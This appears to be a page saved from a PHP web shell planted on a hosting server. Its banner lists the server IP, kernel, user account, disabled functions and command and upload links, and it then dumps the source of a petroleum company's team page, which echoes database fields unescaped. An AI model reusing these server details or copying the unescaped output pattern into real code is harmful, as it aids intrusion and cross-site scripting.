Server IP : 103.53.40.154 / Your IP : 3.145.167.58 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/ginyardpetroleum.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html dir="ltr" lang="en"> <head> <!-- Meta Tags --> <meta name="viewport" content="width=device-width,initial-scale=1.0" /> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Industrypress - Factory & Industrial Business Template" /> <meta name="keywords" content="building,business,construction,cleaning,transport,workshop" /> <meta name="author" content="ThemeMascot" /> <!-- Page Title --> <title>Team | Ginyard Petroleum Pvt. Ltd.</title> <?php include 'top-link.php';?> </head> <body class=""> <div id="wrapper" class="clearfix"> <!-- preloader --> <div id="preloader"> <div id="spinner"> <img class="ml-5" src="<?php echo $wspath?>images/preloaders/3.gif" alt=""> </div> <div id="disable-preloader" class="btn btn-default btn-sm">Disable Preloader</div> </div> <?php include 'header.php';?> <section class="inner-header divider parallax layer-overlay overlay-dark-5" data-bg-img="<?php echo $wspath?>images/sl3.jpg"> <div class="container pt-100 pb-50"> <!-- Section Content --> <div class="section-content pt-100"> <div class="row"> <div class="col-md-12"> <h3 class="title text-white">Our Team</h3> <ul class="breadcrumb white"> <li><a href="<?php echo $wspath?>">Home</a></li> <li class="active">Our Team</li> </ul> </div> </div> </div> </div> </section> <!-- Section: Team --> <section> <div class="container pb-0"> <div class="section-content"> <?php $sqlteam = "SELECT * FROM `tbl_team`"; $runteam = mysqli_query($db,$sqlteam) or die("Query Not run"); while($datateam = mysqli_fetch_assoc($runteam)){ ?> <div class="row"> <div class="col-xs-4 col-sm-12 col-md-4"> <div class="team-members maxwidth400 mb-60"> <div class="team-thumb"> <img style="MARGIN: AUTO;display: block;" src="<?php echo $wspath?>admin/images/property-image/<?php echo $datateam['t_image']?>" alt="<?php echo $datateam['t_name']?>" class="img-fluid"> </div> </div> </div> <div class="col-xs-8 col-sm-12 col-md-8"> <div class="team-members maxwidth400 mb-60"> <h4 class="line-bottom text-uppercase m-0 pb-5"><?php echo $datateam['t_name']?></h4> <h6 class="mt-10 font-13 text-gray"><?php echo $datateam['t_designation']?></h6> <p><?php echo $datateam['t_about'];?></p> </div> </div> </div> <?php } ?> <!-- <div class="row">--> <!-- <div class="col-xs-4 col-sm-12 col-md-4">--> <!-- <div class="team-members maxwidth400 mb-60">--> <!-- <div class="team-thumb">--> <!-- <img style="MARGIN: AUTO;display: block;" src="images/team2.jpg" alt="" class="img-fluid">--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- <div class="col-xs-8 col-sm-12 col-md-8">--> <!-- <div class="team-members maxwidth400 mb-60">--> <!-- <h4 class="line-bottom text-uppercase m-0 pb-5">Mr. C P Maurya </h4>--> <!-- <h6 class="mt-10 font-13 text-gray">Director</h6>--> <!-- <p>Mr. C P Maurya is a graduate in Mechanical engineering from Uttar Pradesh Technical University having 7 years of experience in business due diligence and resource mobilization. His vision and proficiency in venturing into new markets and succeeding are exceptional. --> <!--</p>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> </div> </div> </section> <?php include 'footer.php';?> </div> </body> </html>